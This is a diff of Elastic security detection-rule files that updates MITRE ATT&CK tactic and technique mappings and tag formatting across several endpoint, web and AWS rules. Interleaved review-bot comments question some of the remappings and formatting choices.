 severity = "high"
-tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"]
+tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Lateral Movement", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -111,3 +111,15 @@ The detection rule uses alert data to determine when multiple alerts from differ
 - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
index 56a10ffcee4..4725b801ac1 100644
--- a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
+++ b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["endpoint", "checkpoint_email"]
 maturity = "production"
-updated_date = "2025/12/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -18,15 +18,7 @@ name = "Elastic Defend and Email Alerts Correlation"
 risk_score = 73
 rule_id = "c562a800-cf97-464e-9d6f-84db91e86e10"
 severity = "high"
-tags = [
-    "Use Case: Threat Detection",
-    "Rule Type: Higher-Order Rule",
-    "Resources: Investigation Guide",
-    "Data Source: Elastic Defend",
-    "Data Source: Check Point Harmony Email & Collaboration",
-    "Domain: Email",
-    "Domain: Endpoint"
-]
+tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Check Point Harmony Email & Collaboration", "Domain: Email", "Domain: Endpoint"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -82,3 +74,16 @@ This rule correlates any Elastic Defend alert with an email security related ale
 - Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.
 - Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.
 - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign."""
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
index 03f1778d43d..5e2d9eb2fd5 100644
--- a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
+++ b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml
@@ -3,7 +3,7 @@ creation_date = "2026/02/03"
 maturity = "production"
 min_stack_comments = "ES|QL COMPLETION command requires Elastic Managed LLM (gp-llm-v2) available in 9.3.0+"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -73,14 +73,7 @@ following the [LLM connector documentation](https://www.elastic.co/docs/explore-
 and update the `inference_id` parameter in the query to reference your configured connector.
 """
 severity = "critical"
-tags = [
-    "Domain: Identity",
-    "Domain: LLM",
-    "Use Case: Threat Detection",
-    "Use Case: Identity and Access Audit",
-    "Resources: Investigation Guide",
-    "Rule Type: Higher-Order Rule",
-]
+tags = ["Domain: Identity", "Domain: LLM", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -159,3 +152,15 @@ from .alerts-security.* METADATA _id, _version, _index
 | keep user.name, user.id, user.email, host.name, message, event.reason, event.outcome, event.category, event.action, Esql.*
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
index 6d27f7fa239..61bc47503c2 100644
--- a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
+++ b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml
@@ -2,7 +2,7 @@ creation_date = "2020/12/22"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -54,16 +54,7 @@ SSH authorized_keys files are crucial for secure, password-less authentication,
 risk_score = 47
 rule_id = "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f"
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "OS: macOS",
-    "Use Case: Threat Detection",
-    "Tactic: Lateral Movement",
-    "Tactic: Persistence",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -104,35 +95,6 @@ reference = "https://attack.mitre.org/techniques/T1098/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1021.004"
-name = "SSH"
-reference = "https://attack.mitre.org/techniques/T1021/004/"
-
-[[rule.threat.technique]]
-id = "T1563"
-name = "Remote Service Session Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1563.001"
-name = "SSH Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/001/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.executable"]
diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
index e71c50e44c1..144a469096a 100644
--- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml
+++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -52,21 +52,7 @@ This rule flags web requests whose URLs embed command-execution payloads—inter
 risk_score = 21
 rule_id = "f3ac6734-7e52-4a0d-90b7-6847bf4308f2"
 severity = "low"
-tags = [
-    "Domain: Web",
-    "Use Case: Threat Detection",
-    "Tactic: Reconnaissance",
-    "Tactic: Persistence",
-    "Tactic: Execution",
-    "Tactic: Credential Access",
-    "Tactic: Command and Control",
-    "Data Source: Nginx",
-    "Data Source: Apache",
-    "Data Source: Apache Tomcat",
-    "Data Source: IIS",
-    "Data Source: Traefik",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -157,34 +143,11 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
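Review bot: With the T1505.003 Web Shell entry removed here, nothing in the rule maps to Persistence any more, yet the file is still `persistence_web_server_potential_command_injection.toml`, so the path prefix no longer matches any tactic the rule carries (the tags hunk above lists Execution and Initial Access). Rename the file to match the primary tactic, e.g. `execution_web_server_potential_command_injection.toml`, or keep a Persistence entry if a web shell dropped through command injection is still in scope for this query. Dropping only the `T1059.004` Unix Shell sub-technique while keeping `T1059` looks deliberate for a rule whose integrations include IIS, but a short sentence in the description saying the payloads are not shell-specific would make that reasoning survive the next review. The hunk's tail (the Execution tactic `reference` line) is outside this hunk.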
@@ -194,34 +157,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1595"
-name = "Active Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1595.002"
-name = "Vulnerability Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/002/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1595.003"
-name = "Wordlist Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/003/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
 [rule.threat.tactic]
-id = "TA0043"
-name = "Reconnaissance"
-reference = "https://attack.mitre.org/tactics/TA0043/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
index 1aa962b8f7f..ed89b2cff74 100644
--- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
+++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
@@ -2,7 +2,7 @@ creation_date = "2021/01/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -19,15 +19,7 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan
 risk_score = 73
 rule_id = "76152ca1-71d0-4003-9e37-0983e12832da"
 severity = "high"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "OS: macOS",
-    "Use Case: Threat Detection",
-    "Tactic: Privilege Escalation",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -72,19 +64,36 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1548.003"
 name = "Sudo and Sudo Caching"
 reference = "https://attack.mitre.org/techniques/T1548/003/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
index 0c3fbef2c2e..86ff78db35a 100644
--- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
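Review bot: The second `[[rule.threat]]` entry added in the threat hunk is formatted differently from the first one in the same hunk: the Defense Evasion entry gains blank lines after `framework` and between the technique and its sub-technique, while the Privilege Escalation entry packs `[[rule.threat.technique]]`, `[[rule.threat.technique.subtechnique]]` and `[rule.threat.tactic]` together with no separation. Add the same blank line before `+[[rule.threat.technique.subtechnique]]` and before the trailing `[rule.threat.tactic]` in the second entry so the two near-identical blocks read the same and a later diff of one against the other is trivial. Whether the formatter that produced the single-line `tags` array in the hunk above is also meant to normalise these blocks is not visible here; if it is, the inconsistency suggests the second entry was hand-added after the tool ran.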
+++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -57,15 +57,7 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan
 risk_score = 21
 rule_id = "8a1b0278-0f9a-487d-96bd-d4833298e87a"
 severity = "low"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "OS: macOS",
-    "Use Case: Threat Detection",
-    "Tactic: Privilege Escalation",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -100,14 +92,24 @@ name = "Setuid and Setgid"
 reference = "https://attack.mitre.org/techniques/T1548/001/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
+
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml
index d94587dd5b0..2d7f9b35b02 100644
--- a/rules/cross-platform/privilege_escalation_trap_execution.toml
+++ b/rules/cross-platform/privilege_escalation_trap_execution.toml
@@ -2,7 +2,7 @@ creation_date = "2023/08/24"
 integration = ["endpoint", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -49,17 +49,7 @@ This rule flags use of the shell built-in trap to bind commands to POSIX signals
 risk_score = 21
 rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e"
 severity = "low"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "OS: macOS",
-    "Use Case: Threat Detection",
-    "Tactic: Privilege Escalation",
-    "Data Source: Elastic Defend",
-    "Data Source: Elastic Endgame",
-    "Data Source: Auditd Manager",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -81,6 +71,6 @@ name = "Trap"
 reference = "https://attack.mitre.org/techniques/T1546/005/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
index a21ef09d5a0..6f708721b17 100644
--- a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
+++ b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml
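Review bot: Swapping the tactic on the T1546.005 Trap entry from Privilege Escalation to Persistence drops a tactic that ATT&CK lists for T1546 as well, whereas the sudoers and setuid hunks earlier in this commit handle a dual-tactic technique by keeping both tactics as two `[[rule.threat]]` entries for the same sub-technique. If elevation via a signal-bound trap is still in scope, keep both entries and restore `"Tactic: Privilege Escalation"` in the tags hunk above; if it is not, the file name `privilege_escalation_trap_execution.toml` no longer matches the only tactic the rule carries and should be renamed alongside. The enclosing `[[rule.threat]]` block starts before this hunk. The two-entry form would look like this after the existing Persistence tactic:

```toml
reference = "https://attack.mitre.org/tactics/TA0003/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1546"
name = "Event Triggered Execution"
reference = "https://attack.mitre.org/techniques/T1546/"

[[rule.threat.technique.subtechnique]]
id = "T1546.005"
name = "Trap"
reference = "https://attack.mitre.org/techniques/T1546/005/"

[rule.threat.tactic]
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
```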
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -105,11 +105,6 @@ id = "T1595"
 name = "Active Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/"
-[[rule.threat.technique.subtechnique]]
-id = "T1595.002"
-name = "Vulnerability Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/002/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1595.003"
 name = "Wordlist Scanning"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
index 6e1a850949f..a0d76d21725 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis"]
 maturity = "production"
-updated_date = "2025/12/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -99,11 +99,6 @@ id = "T1595.002"
 name = "Vulnerability Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1595.003"
-name = "Wordlist Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/003/"
-
 [rule.threat.tactic]
 id = "TA0043"
 name = "Reconnaissance"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
index 474e146dc74..0f3c8e22610 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,11 +117,6 @@ id = "T1595.002"
 name = "Vulnerability Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1595.003"
-name = "Wordlist Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/003/"
-
 [rule.threat.tactic]
 id = "TA0043"
 name = "Reconnaissance"
diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
index f98e838dc84..e2c8e39c56d 100644
--- a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
+++ b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/19"
 integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -50,18 +50,7 @@ This rule flags surges of web requests that advertise scanner or brute-force too
 risk_score = 21
 rule_id = "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35"
 severity = "low"
-tags = [
-    "Domain: Web",
-    "Use Case: Threat Detection",
-    "Tactic: Reconnaissance",
-    "Tactic: Credential Access",
-    "Data Source: Nginx",
-    "Data Source: Apache",
-    "Data Source: Apache Tomcat",
-    "Data Source: IIS",
-    "Data Source: Traefik",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -126,11 +115,6 @@ id = "T1595"
 name = "Active Scanning"
 reference = "https://attack.mitre.org/techniques/T1595/"
-[[rule.threat.technique.subtechnique]]
-id = "T1595.001"
-name = "Scanning IP Blocks"
-reference = "https://attack.mitre.org/techniques/T1595/001/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1595.002"
 name = "Vulnerability Scanning"
@@ -145,16 +129,3 @@ reference = "https://attack.mitre.org/techniques/T1595/003/"
 id = "TA0043"
 name = "Reconnaissance"
 reference = "https://attack.mitre.org/tactics/TA0043/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml
index 21998af8115..839ce6d42d9 100644
--- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml
+++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml
@@ -2,7 +2,7 @@ creation_date = "2020/06/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -69,15 +69,7 @@ references = [
 risk_score = 21
 rule_id = "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed"
 severity = "low"
-tags = [
-    "Domain: Cloud",
-    "Data Source: AWS",
-    "Data Source: Amazon Web Services",
-    "Data Source: AWS Cloudtrail",
-    "Use Case: Log Auditing",
-    "Tactic: Collection",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
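Review bot: Removing the whole T1110 Brute Force / Credential Access entry contradicts the rule's own description, which the tags-hunk header in the previous line quotes as flagging requests that advertise scanner or brute-force tools. If brute-force user agents are still part of the query, keep the Credential Access `[[rule.threat]]` entry and put `"Tactic: Credential Access"` back in the tags; if the query was narrowed to scanners only, update the description so the text and the mapping agree, since analysts filter by tactic. The `T1595.001` Scanning IP Blocks removal in the hunk above reads as correct for a user-agent based rule and needs no further note.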
@@ -91,17 +83,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
     "@timestamp",
diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
index d649ef077c5..8faabf103c2 100644
--- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
+++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml
@@ -2,7 +2,7 @@ creation_date = "2024/12/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
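Review bot: Mapping a rule that fires on trail *creation* (per its file name `collection_cloudtrail_logging_created.toml`; the query itself is not in this hunk) to T1562.008 Disable or Modify Cloud Logs is a stretch, because that sub-technique describes disabling, deleting or reconfiguring logging, and creating a trail does not by itself impair any existing log source, so an analyst pivoting from Defense Evasion lands on a rule that fires on a defensive action. The previous T1530 / Collection mapping was worse, so the direction is right, but if the intent is that an adversary creates a trail to redirect or replace logging, that rationale belongs in the description; otherwise consider leaving the rule with `Use Case: Log Auditing` and no ATT&CK entry, as this commit already does for the Zoom rule. Either way a one-line `# NOTE:` above `[[rule.threat]]` explaining why a create event is treated as log tampering would keep the next reviewer from re-raising this.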
@@ -92,15 +92,7 @@ risk_score = 47
 rule_id = "59bf26c2-bcbe-11ef-a215-f661ea17fbce"
 setup = "S3 data events must be enabled in CloudTrail to capture the GetObject, PutObject, ListObjects, and DeleteObject actions. Ensure that the AWS CloudTrail service is configured to log data events for the S3 bucket you'd like to monitor."
 severity = "medium"
-tags = [
-    "Domain: Cloud",
-    "Data Source: AWS",
-    "Data Source: Amazon Web Services",
-    "Data Source: Amazon S3",
-    "Use Case: Asset Visibility",
-    "Resources: Investigation Guide",
-    "Tactic: Collection",
-]
+tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Discovery", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -121,42 +113,42 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1530"
 name = "Data from Cloud Storage"
 reference = "https://attack.mitre.org/techniques/T1530/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1619"
 name = "Cloud Storage Object Discovery"
 reference = "https://attack.mitre.org/techniques/T1619/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
-
 [rule.investigation_fields]
 field_names = [
     "@timestamp",
diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
index 7bf37ce9e83..244fef8f9cb 100644
--- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
+++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml
@@ -2,7 +2,7 @@ creation_date = "2024/04/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2025/06/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -95,22 +95,16 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
